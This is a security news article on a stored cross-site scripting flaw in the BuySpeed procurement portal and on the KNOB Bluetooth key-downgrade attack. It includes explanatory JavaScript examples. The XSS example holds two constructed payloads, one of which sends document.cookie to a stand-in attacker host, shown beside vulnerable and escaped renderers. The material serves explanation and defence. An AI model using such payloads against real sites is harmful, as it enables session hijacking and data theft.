Public Procurement Portal BuySpeed Fixes Cybersecurity Flaw


Procure-to-pay tool BuySpeed, which is used by government entities, was vulnerable to a cross-site scripting (XSS) flaw that was disclosed as a zero-day, with no fix available when the advisory went out; the vendor now says it has been resolved, SC Media reported.

The CERT Coordination Center (CERT/CC) at Carnegie Mellon University’s Software Engineering Institute had published a vulnerability note on the bug, found in version 14.5 of the product, in which it said it was not aware of a practical solution.

Periscope Holdings, which owns BuySpeed, said in a statement per the outlet, “We were aware of CERT Vulnerability Note VU#660597. We have already developed remediation and have made this available to customers. We are alerting CERT of the remediation so they can correct their advisory.”

CERT had noted in its advisory that the flaw “could allow a local, authenticated attacker to store arbitrary JavaScript within the application. This JavaScript is subsequently displayed by the application without sanitization, leading to it executing in the browser of the user. This could potentially allow for website redirection, session hijacking, or information disclosure.”
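The advisory text describes a stored XSS: input written by one authenticated user is persisted and later rendered to other users without output encoding. The following is an added example, not BuySpeed code or anything taken from the advisory, contrasting a vulnerable server-side rendering with its escaped form. The profile store, the `displayName` field, the attacker hostname and both payloads are assumptions constructed for the illustration.

```javascript
// Added example, not BuySpeed or Periscope code: a stored XSS of the kind the
// advisory describes, with the vulnerable rendering beside an escaped one.
// The profile store, field names, hostnames and payloads are constructed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Escapes a value for insertion into HTML text or a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Stand-in for the application's persistent store: what an authenticated
// user saved in a free-text field earlier.
const profiles = new Map();

function saveProfile(userId, displayName) {
  profiles.set(userId, { displayName });
}

// Vulnerable rendering: the stored value is spliced into the page as-is, so
// whatever one user saved runs in the browser of everyone who views it.
function renderProfileVulnerable(userId) {
  const { displayName } = profiles.get(userId);
  return `<h2>Vendor: ${displayName}</h2>\n` +
         `<input type="text" name="displayName" value="${displayName}">`;
}

// Fixed rendering: the same template, with the untrusted value escaped in
// both output contexts it lands in (element text and attribute value).
function renderProfileFixed(userId) {
  const { displayName } = profiles.get(userId);
  const safe = escapeHtml(displayName);
  return `<h2>Vendor: ${safe}</h2>\n` +
         `<input type="text" name="displayName" value="${safe}">`;
}

// Two payloads a malicious authenticated user could store: one that injects
// a script element into the text context, one that closes the attribute and
// adds an event handler. Both are constructed for this example.
const SCRIPT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c=" + document.cookie</script>';
const ATTRIBUTE_PAYLOAD =
  '" autofocus onfocus="document.location=\'https://attacker.example/\'';

// Runs both payloads through both renderers and reports whether the
// injected markup survived into the output.
function compareRenderings() {
  saveProfile('attacker-1', SCRIPT_PAYLOAD);
  saveProfile('attacker-2', ATTRIBUTE_PAYLOAD);
  const scriptTag = /<script\b/i;
  const handlerAttr = /\sonfocus="/i;
  return {
    vulnerableExecutesScript: scriptTag.test(renderProfileVulnerable('attacker-1')),
    fixedExecutesScript: scriptTag.test(renderProfileFixed('attacker-1')),
    vulnerableAddsHandler: handlerAttr.test(renderProfileVulnerable('attacker-2')),
    fixedAddsHandler: handlerAttr.test(renderProfileFixed('attacker-2')),
  };
}
```

Escaping at render time rather than on save is what lets a fix cover data that is already stored, which matters for a flaw like this one where malicious records may have been written before the patch. The encoding is also context-specific: a value placed inside a JavaScript string, a URL or a CSS block needs a different encoder than the HTML one above. HttpOnly session cookies and a Content Security Policy blunt the session-hijacking outcome the advisory mentions but do not remove the bug.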

Periscope Holdings, which is based in Texas, supplies procurement software and services for buyers and sellers of commodities and services in the public sector. The company holds the exclusive license to maintain, develop and market the NIGP Commodity/Services Code of the National Institute of Governmental Purchasing (NIGP), and it also runs the NIGP Consulting Program.

In separate security news, a Bluetooth flaw disclosed in August could leave users’ data exposed to attackers. It was found by researchers who presented their findings at the USENIX Security Symposium.

The attack, named “Key Negotiation Of Bluetooth” (KNOB), targets the key-size negotiation two devices perform when setting up an encrypted Bluetooth connection. An attacker positioned between the devices can force both sides to agree on an encryption key with as little as one byte of entropy, which can then be brute-forced in a fraction of a second, exposing the traffic on the link.

At the time, the researchers indicated that Bluetooth chips from multiple vendors were vulnerable to the attack. The flaw affects Bluetooth BR/EDR (Classic); Bluetooth Low Energy was noted as not affected.
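How the downgrade works, as an added illustration that is not the researchers’ code or any Bluetooth stack: the key-size proposals the two devices exchange in LMP are neither encrypted nor integrity-protected, so an attacker who relays them can lower both proposals to one byte, after which the reduced key is found by trying all 256 values against a known message. The toy keystream generator below stands in for Bluetooth’s E0 cipher; the link key, the device objects, the plaintext and the `tamper` hook are all constructed for the example. The mitigation shown at the end, refusing key sizes below 7 bytes, is the minimum the Bluetooth SIG recommended after the disclosure.

```javascript
// Added illustration of the KNOB key-size downgrade; not the researchers' code
// and not a Bluetooth implementation. The toy cipher, sample link key, device
// objects and tamper hook are constructed for this example.

const MAX_KEY_BYTES = 16;

// Toy keystream generator standing in for Bluetooth's E0: an xorshift32 state
// seeded from all 16 key bytes. Not a real cipher, only deterministic.
function keystream(keyBytes, length) {
  let s = 0x9e3779b9;
  for (const b of keyBytes) s = (Math.imul(s ^ b, 0x01000193) >>> 0) || 1;
  const out = [];
  for (let i = 0; i < length; i++) {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5; s >>>= 0;
    out.push(s & 0xff);
  }
  return out;
}

function xorCrypt(keyBytes, data) {
  const ks = keystream(keyBytes, data.length);
  return data.map((b, i) => b ^ ks[i]);
}

// BR/EDR derives the encryption key from the link key and then reduces it to
// the negotiated number of entropy bytes; modelled here by zeroing the rest.
function reduceKey(linkKey, entropyBytes) {
  return linkKey.map((b, i) => (i < entropyBytes ? b : 0));
}

// LMP key-size negotiation: each side proposes a maximum and enforces its own
// minimum; the agreed size is the smaller proposal if both sides accept it.
// The proposals carry no integrity protection, so a man-in-the-middle may
// rewrite them in transit (the `tamper` hook).
function negotiateKeySize(deviceA, deviceB, tamper = x => x) {
  const seenByB = tamper(deviceA.proposes);   // A -> (MITM) -> B
  const seenByA = tamper(deviceB.proposes);   // B -> (MITM) -> A
  const agreed = Math.min(seenByA, seenByB);
  if (agreed < deviceA.minimum || agreed < deviceB.minimum) return null;
  return agreed;
}

// Exhaustive search of the reduced key space against a known plaintext and
// its ciphertext; bounded so the demo cannot run away on larger sizes.
function bruteForceKey(entropyBytes, plaintext, ciphertext) {
  if (entropyBytes > 2) throw new Error('demo limited to <= 2 bytes of entropy');
  const candidates = 256 ** entropyBytes;
  for (let k = 0; k < candidates; k++) {
    const guess = new Array(MAX_KEY_BYTES).fill(0);
    for (let i = 0, v = k; i < entropyBytes; i++, v = Math.floor(v / 256)) guess[i] = v & 0xff;
    const trial = xorCrypt(guess, plaintext);
    if (trial.every((b, i) => b === ciphertext[i])) return { key: guess, attempts: k + 1 };
  }
  return null;
}

function knobDemo() {
  // Constructed 16-byte link key shared by the two victim devices.
  const linkKey = [0x7a, 0x13, 0xc4, 0x90, 0x5e, 0x21, 0xaa, 0x08,
                   0x3f, 0xd2, 0x66, 0x19, 0xb7, 0x04, 0xe8, 0x51];
  const plaintext = Array.from('PO #1234 approved', c => c.charCodeAt(0));
  const a = { proposes: 16, minimum: 1 };   // pre-KNOB default minimum: 1 byte
  const b = { proposes: 16, minimum: 1 };

  const honestSize = negotiateKeySize(a, b);
  const attackedSize = negotiateKeySize(a, b, () => 1);   // KNOB: force 1 byte

  const ciphertext = xorCrypt(reduceKey(linkKey, attackedSize), plaintext);
  const found = bruteForceKey(attackedSize, plaintext, ciphertext);
  const recovered = found !== null &&
    reduceKey(linkKey, attackedSize).every((v, i) => v === found.key[i]);

  // Mitigation adopted after KNOB: refuse any key shorter than 7 bytes.
  const hardenedResult = negotiateKeySize({ ...a, minimum: 7 }, { ...b, minimum: 7 }, () => 1);

  return { honestSize, attackedSize, attempts: found ? found.attempts : null,
           recovered, hardenedResult };
}
```

The point the simulation makes is that the cipher itself is never broken: the attacker only needs the two endpoints to accept a one-byte key, which the protocol allowed by default, and the fix is a policy check on the negotiated size rather than a change to the cipher.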